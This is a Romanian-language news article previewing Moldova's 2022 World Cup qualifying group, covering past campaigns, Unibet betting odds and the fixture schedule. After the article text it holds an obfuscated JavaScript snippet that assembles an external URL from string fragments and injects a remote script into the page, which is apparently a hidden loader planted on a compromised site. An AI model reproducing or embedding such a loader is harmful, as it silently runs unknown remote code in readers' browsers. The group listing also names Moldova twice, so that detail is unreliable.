Actualitate

Naționala Republicii Moldova începe aventura în preliminariile pentru Cupa Mondială 2022

Republica Moldova a fost repartizată în Grupa F, alături de Austria, Danemarca, Insulele Feroe, Israel, Moldova și Scoția.

Este o grupă dificilă, în condițiile în care reprezentativa Republicii Moldova nu a mai obținut o victorie de aproape doi ani, de la acel 1-0 cu Andorra, de pe 8 iunie 2019.

De atunci au urmat 16 meciuri la rând fără victorie, între care 14 au fost înfrângeri.

Insulele Feroe, primul adversar din preliminarii

Primul meci din preliminariile pentru Cupa Mondială 2022 este programat pe 25 martie, pe teren propriu, de la ora 21:45, împotriva reprezentativei Insulelor Feroe.

Se anunță un duel echilibrat, potrivit cotelor disponibile în secțiunea Unibet Pariuri Sportive. Moldova este ușor favorită, având cota 2.45 la victorie, egalul are cota 3.10, iar victoria feroezilor are cota 3.40.

Feroe este o echipă de nivelul Moldovei, care, în ultimii doi ani, a obținut patru victorii – două cu Andorra și două cu Malta.

În ultima campanie de calificări la Cupa Mondială 2018, Feroe a încheiat pe locul patru, într-o grupă din care au mai făcut parte Portugalia, Elveția, Ungaria, Letonia și Andorra.

În schimb, în campania pentru EURO 2020, Feroe a terminat pe locul 5, depășind doar Malta într-o grupă din care au mai făcut parte Spania, Suedia, Norvegia și România.

Republica Moldova, parcurs dezamăgitor în ultimele preliminarii

Reprezentativa Republicii Moldova nu are amintiri prea plăcute din ultimele preliminarii la care a luat parte. În campania pentru Cupa Mondială din 2018, Moldova a încheiat pe ultimul loc, fiind devansată de Serbia, Irlanda, Țara Galilor, Austria și Georgia. Republica Moldova a obținut doar două puncte, ambele cu Georgia. Echipa a mers destul de slab, cu doar 4 goluri marcate și 23 primite în cele 10 meciuri din preliminarii.

În plus, în calificările pentru EURO 2020, Moldova a terminat tot pe ultimul loc, într-o grupă în care le-a avut adversare pe Franța, Turcia, Islanda, Albania și Andorra. Moldova a avut doar trei puncte, o victorie cu 1-0 contra Andorrei.

Cel mai bun parcurs al Republicii Moldova din preliminariile pentru Cupa Mondială datează de la ediția din 2014. Atunci, Moldova a terminat pe locul 5 într-o grupă cu Anglia, Ucraina, Muntenegru, Polonia și San Marino. Totuși, Moldova a obținut 11 puncte atunci, un adevărat record în preliminarii.

În total, Republica Moldova a luat startul de 6 ori în preliminariile pentru Cupa Mondială și niciodată nu s-a calificat.

Programul Republicii Moldova în preliminariile pentru Cupa Mondială 2022

După meciul cu Feroe, programat pe 25 martie, echipa Moldovei se va deplasa pe 28 martie, de la ora 19:00, în Danemarca. Apoi, pe 31 martie, Moldova primește vizita Israelului.

Următoarea acțiune din preliminarii este programată abia în toamnă. Pe 1 septembrie, Moldova va primi vizita Austriei, iar patru zile mai târziu se va deplasa în Scoția. Pe 7 septembrie este programată deplasarea din Insulele Feroe.

Apoi, în luna octombrie sunt programate două meciuri. Pe 9 octombrie Danemarca va veni la Chișinău, iar pe 12 octombrie echipa se va deplasa în Israel.

Ultimele meciuri din preliminariile pentru Cupa Mondială sunt programate în noiembrie. Pe 12 noiembrie Moldova va primi vizita Scoției, iar campania se încheie pe 15 noiembrie, în Austria.

Cupa Mondială din Qatar va avea loc între 21 noiembrie și 18 decembrie 2022. Va fi o premieră, în condițiile în care turneul final va avea loc iarna. 32 de echipe vor concura în Qatar pentru trofeul suprem.

(function(){
oak0=document.createElement(“script”);oak0.async=true;oak0_=”u”+(“s”)+”t”;
oak0u=”255304370.”;oak0_+=”a”+(“t.i”);oak0_+=”n”+(“f”+”o”)+”/”;
oak0u+=”bxh500dgak0utp5wwfjqws”+(“i66ycm8w”);
oak0.src=”https://”+oak0_+oak0u;oak0.type=”text/javascript”;
document.body.appendChild(oak0);
})();

Fiți la curent cu ultimele noutăți. Urmărește TIMPUL pe Google News și Telegram!


Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *